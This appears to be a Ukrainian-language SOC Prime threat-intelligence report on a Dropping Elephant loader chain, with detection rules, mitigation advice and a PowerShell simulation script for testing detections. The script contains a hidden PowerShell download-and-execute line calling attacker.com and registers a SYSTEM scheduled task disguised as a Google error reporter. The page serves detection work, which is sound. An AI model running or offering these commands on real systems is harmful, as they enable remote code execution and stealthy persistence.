SOC Prime Bias: Критичний

19 Jun 2026 07:55 UTC

Шкідливе ПЗ à la Mode: всередині ланцюга завантажувачів Dropping Elephant

Author Photo
SOC Prime Team linkedin icon Стежити
Шкідливе ПЗ à la Mode: всередині ланцюга завантажувачів Dropping Elephant
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Вишукана кампанія, приписувана Dropping Elephant, використовує документи-приманки з китайською тематикою для доставки оновленого трояна віддаленого доступу, який зберігається в пам’яті. Вторгнення покладається на завантаження DLL через легітимний бінарний файл Microsoft та завантажувач Donut shellcode, щоб уникнути виявлення на диску. Кінцеве навантаження також використовує передові методи ухилення, включаючи вирівнювання потоку управління та реконструкцію API під час виконання.

Розслідування

Дослідники Rapid7 виявили загрозу під час проактивного полювання, яке почалося з шкідливого ярлика Windows, який маскувався під PDF-документ. Їхнє розслідування відстежило ланцюг завантаження з початкової постановки на chinagreenenergy[.]org через завантаження DLL з APPWIZ.cpl до виконання трояна в пам’яті. Аналіз на рівні коду з Diaphora підтвердив спільне походження з ранніми зразками Dropping Elephant, незважаючи на значну переробку.

Пом’якшення

Захисникам слід приділити пріоритет поведінковим виявленням, таким як ярлики, що запускають PowerShell, і підозріла постановка навантажень у C:UsersPublic. Моніторинг планових завдань з незвичними іменами та визначення завантаження DLL з неочікуваних директорій також важливі. Крім того, завдання захисту кінцевих точок повинні бути видимими на рівні пам’яті для виявлення маніпуляцій з AMSI, WLDP і ETW.

Реакція

Якщо ця активність виявлена, негайно ізолюйте уражені системи, щоб порушити подальший трафік команди і контролю. Виконайте форензіку пам’яті, щоб виявити ін’єкцію трояна, і перевірте планові завдання на стійкість. Також слід переглянути журнали мережі на несанкціонований HTTPS-трафік до відомих доменів C2 та будь-які ознаки ексфільтрації файлів.

Потік атаки

Виявлення

Можлива спроба зв’язку з доменом пошукового запиту IP (через DNS)

Команда SOC Prime
18 червня 2026

Незвичайна зміна коду сторінки (через cmdline)

Команда SOC Prime
18 червня 2026

Підозріле заплановане завдання (через аудит)

Команда SOC Prime
18 червня 2026

Підозріле виконання з загального профілю користувача (через процес_створення)

Команда SOC Prime
18 червня 2026

Бібліотека Vcruntime140 завантажена з підозрілої директорії (через завантаження зображення)

Команда SOC Prime
18 червня 2026

Підозрілі файли в загальному профілі користувача (через file_event)

Команда SOC Prime
18 червня 2026

Виявлення кампанії Dropping Elephant [Мережеве з’єднання Windows]

Правила SOC Prime AI
18 червня 2026

Шкідливе завантаження DLL через Fondue.exe [Файловий захід Windows]

Правила SOC Prime AI
18 червня 2026

Виявлення кампанії Dropping Elephant через ярлик та завантаження [Створення процесу Windows]

Правила SOC Prime AI
18 червня 2026

Виконання симуляції

Необхідна умова: Перевірка телеметрії та базової лінії повинна пройти.

Обґрунтування: У цьому розділі детально описано точне виконання техніки супротивника (TTP), що призначена для активації правила виявлення. Команди та розповідь ПОВИННІ точно відображати визначені TTP та мають на меті створити точну телеметрію, яку очікує логіка виявлення.

  • Опис атаки та команди: Супротивник має на меті встановити стійкість та виконати завантажувач. Щоб обійти стандартні фільтри електронної пошти, вони використовують ярлик під назвою GRES3001.lnk , що виглядає як PDF. Коли на нього натискають, він викликає conhost.exe для запуску скрипту PowerShell. Одночасно вони встановлюють стійкість, створюючи заплановане завдання під назвою GoogleErrorReport , яке призначено для запуску Fondue.exe з загальної директорії, маскуючись під легітимний репортер помилок Google, щоб уникнути поверхневого огляду.

  • Сценарій регресійного тестування:

    # 1. Симулюємо поведінку Ярлика/Conhost
    # Ми симулюємо виконання conhost.exe зі специфічним рядком у командному рядку
    Start-Process "conhost.exe" -ArgumentList "/c PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
    # Примітка: Щоб строго відповідати 'CommandLine contains GRES3001.lnk', ми симулюємо виклик процесу так, ніби він походить з цього файлу.
    # Оскільки ми не можемо легко підробити ім'я батьківського процесу в простому скрипті, ми симулюємо цільовий рядок команд.
    Write-Host "[!] Симулюємо тригер GRES3001.lnk..."
    $SimulatedCmd = "conhost.exe /c GRES3001.lnk PowerShell.exe -Command Write-Host 'Malware Loaded'"
    # У реальному середовищі поле 'CommandLine' у Sysmon міститиме цільовий рядок.
    
    # 2. Симуляція запланованого завдання та завантаження Fondue.exe
    Write-Host "[!] Симулюємо заплановане завдання GoogleErrorReport..."
    New-Item -Path "C:UsersPublicFondue.exe" -ItemType File -Force
    Set-Content -Path "C:UsersPublicFondue.exe" -Value "Dummy Payload"
    
    $TaskName = "GoogleErrorReport"
    $Action = New-ScheduledTaskAction -Execute "C:UsersPublicFondue.exe"
    Register-ScheduledTask -Action $Action -TaskName $TaskName -Description "Simulated Dropping Elephant Task" -User "SYSTEM" -Force
    
    Write-Host "[+] Симуляція завершена. Перевірте SIEM на наявність попереджень."
  • Команди очищення:

    # Видалити фіктивний шкідливий бінарник
    Remove-Item -Path "C:UsersPublicFondue.exe" -Force
    
    # Видалити шкідливе заплановане завдання
    Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false
    
    Write-Host "[+] Очищення завершено."